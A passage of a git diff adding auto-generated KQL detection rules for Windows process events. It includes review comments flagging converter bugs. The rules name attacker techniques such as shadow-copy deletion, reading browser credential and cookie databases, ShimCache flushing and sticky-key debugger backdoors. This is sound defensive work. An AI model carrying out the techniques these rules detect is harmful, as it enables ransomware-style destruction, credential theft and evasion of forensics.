+// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason
+// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql
new file mode 100644
index 00000000..f7b92e5b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/share_and_session_enumeration_using_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Share And Session Enumeration Using Net.EXE
+// Author: Endgame, JHasenbusch (ported for oscd.community)
+// Date: 2018-10-30
+// Level: low
+// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate use of net.exe utility by legitimate user
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql
new file mode 100644
index 00000000..a249e1da
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shell32_dll_execution_in_suspicious_directory.kql
@@ -0,0 +1,10 @@
+// Title: Shell32 DLL Execution in Suspicious Directory
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects shell32.dll executing a DLL in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql
new file mode 100644
index 00000000..25e4e948
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shell_process_spawned_by_java_exe.kql
@@ -0,0 +1,13 @@
+// Title: Shell Process Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
+// Date: 2021-12-17
+// Level: medium
+// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate calls to system binaries
+// - Company specific internal usage
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/shimcache_flush.kql b/KQL/rules/windows/process_creation/shimcache_flush.kql
new file mode 100644
index 00000000..c8409337
--- /dev/null
+++ b/KQL/rules/windows/process_creation/shimcache_flush.kql
@@ -0,0 +1,10 @@
+// Title: ShimCache Flush
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-01
+// Level: high
+// Description: Detects actions that clear the local ShimCache and remove forensic evidence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql
new file mode 100644
index 00000000..c73d11dc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sql_client_tools_powershell_session_detection.kql
@@ -0,0 +1,13 @@
+// Title: SQL Client Tools PowerShell Session Detection
+// Author: Agro (@agro_sev) oscd.communitly
+// Date: 2020-10-13
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+// - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql
new file mode 100644
index 00000000..d706b07e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sqlite_chromium_profile_data_db_access.kql
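Review bot: `ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe"` in the SQL Client Tools rule is an exact comparison against a value that begins with a backslash; OriginalFileName is a version-resource file name with no path component, so this disjunct can never be true and the rule effectively relies on the two FolderPath checks alone. It should read `ProcessVersionInfoOriginalFileName =~ "sqltoolsps.exe"`, matching how the other rules in this batch compare that column (e.g. `=~ "WBADMIN.EXE"`). The leading backslash is probably inherited from the upstream Sigma rule, so the durable fix is a converter normalisation or an upstream correction rather than an edit to this generated file.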
@@ -0,0 +1,10 @@
+// Title: SQLite Chromium Profile Data DB Access
+// Author: TropChaud
+// Date: 2022-12-19
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql
new file mode 100644
index 00000000..2c1b05c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sqlite_firefox_profile_data_db_access.kql
@@ -0,0 +1,10 @@
+// Title: SQLite Firefox Profile Data DB Access
+// Author: frack113
+// Date: 2022-04-08
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql
new file mode 100644
index 00000000..a7af8e0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/start_of_nt_virtual_dos_machine.kql
@@ -0,0 +1,12 @@
+// Title: Start of NT Virtual DOS Machine
+// Author: frack113
+// Date: 2022-07-16
+// Level: medium
+// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..497aca43
--- /dev/null
+++ b/KQL/rules/windows/process_creation/start_windows_service_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Start Windows Service Via Net.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+// False Positives:
+// - Legitimate administrator or user executes a service for legitimate reasons.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql
new file mode 100644
index 00000000..9b6355fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/sticky_key_like_backdoor_execution.kql
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Execution
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql
new file mode 100644
index 00000000..32097d2e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Net.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "net" utility.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql
new file mode 100644
index 00000000..18221c55
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_powershell_stop_service.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via PowerShell Stop-Service
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Stop-Service " and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql
new file mode 100644
index 00000000..5f3b4964
--- /dev/null
+++ b/KQL/rules/windows/process_creation/stop_windows_service_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: Stop Windows Service Via Sc.EXE
+// Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-05
+// Level: low
+// Description: Detects the stopping of a Windows service via the "sc.exe" utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+// - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " stop " and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspect_svchost_activity.kql b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql
new file mode 100644
index 00000000..88b04fa2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspect_svchost_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspect Svchost Activity
+// Author: David Burkett, @signalblur
+// Date: 2019-12-28
+// Level: high
+// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+// False Positives:
+// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql
new file mode 100644
index 00000000..9b6a5b4e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_active_directory_database_snapshot_via_adexplorer.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: high
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql
new file mode 100644
index 00000000..d641f110
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_advpack_call_via_rundll32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Advpack Call Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: high
+// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql
new file mode 100644
index 00000000..206aa4dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_agentexecutor_powershell_execution.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: high
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
new file mode 100644
index 00000000..5509bc32
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_arcsoc_exe_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious ArcSOC.exe Child Process
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.
+// ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS
+// Server system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding
+// service endpoint and remotely execute code from the ArcSOC.exe process.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.t1203
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\ArcSOC.exe") and (not((ProcessCommandLine =~ "cmd.exe /c \"ver\"" and FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql
new file mode 100644
index 00000000..5f62d985
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_autorun_registry_modified_via_wmi.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Autorun Registry Modified via WMI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-17
+// Level: high
+// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047
+// False Positives:
+// - Legitimate administrative activity or software installations
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or 
ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql
new file mode 100644
index 00000000..15ef6478
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_binary_in_user_directory_spawned_from_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Binary In User Directory Spawned From Office Application
+// Author: Jason Lynch
+// Date: 2019-04-02
+// Level: high
+// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
+
+DeviceProcessEvents
+| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql
new file mode 100644
index 00000000..a8b9d805
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_bitlocker_access_agent_update_utility_execution.kql
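Review bot: The location predicate `ProcessCommandLine contains ":\\ProgramData'"` in the final `where` clause of suspicious_autorun_registry_modified_via_wmi.kql carries a stray trailing single quote, so that branch only matches command lines that literally contain `ProgramData'` and the intended `:\ProgramData` location is effectively dropped from the rule. It should read `ProcessCommandLine contains ":\\ProgramData"`, consistent with the sibling `":\\Perflogs"` and `":\\Windows\\Temp"` terms. Whether the quote originates in the source Sigma rule or in the converter is not visible here; since this file is regenerated by the workflow, the correction belongs upstream or in helper.py rather than in the generated .kql, otherwise the next run will reintroduce it.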
@@ -0,0 +1,11 @@
+// Title: Suspicious BitLocker Access Agent Update Utility Execution
+// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
+// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql
new file mode 100644
index 00000000..14d6f073
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_cabinet_file_execution_via_msdt_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Cabinet File Execution Via Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
+// Date: 2022-06-21
+// Level: medium
+// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+// - Legitimate usage of ".diagcab" files
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql
new file mode 100644
index 00000000..f1415e43
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_calculator_usage.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Calculator Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-09
+// Level: high
+// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql
new file mode 100644
index 00000000..28edfa39
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_certreq_command_to_download.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious CertReq Command to Download
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-11-24
+// Level: high
+// Description: Detects a suspicious CertReq execution downloading a file.
+// This behavior is often used by attackers to download additional payloads or configuration files.
+// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
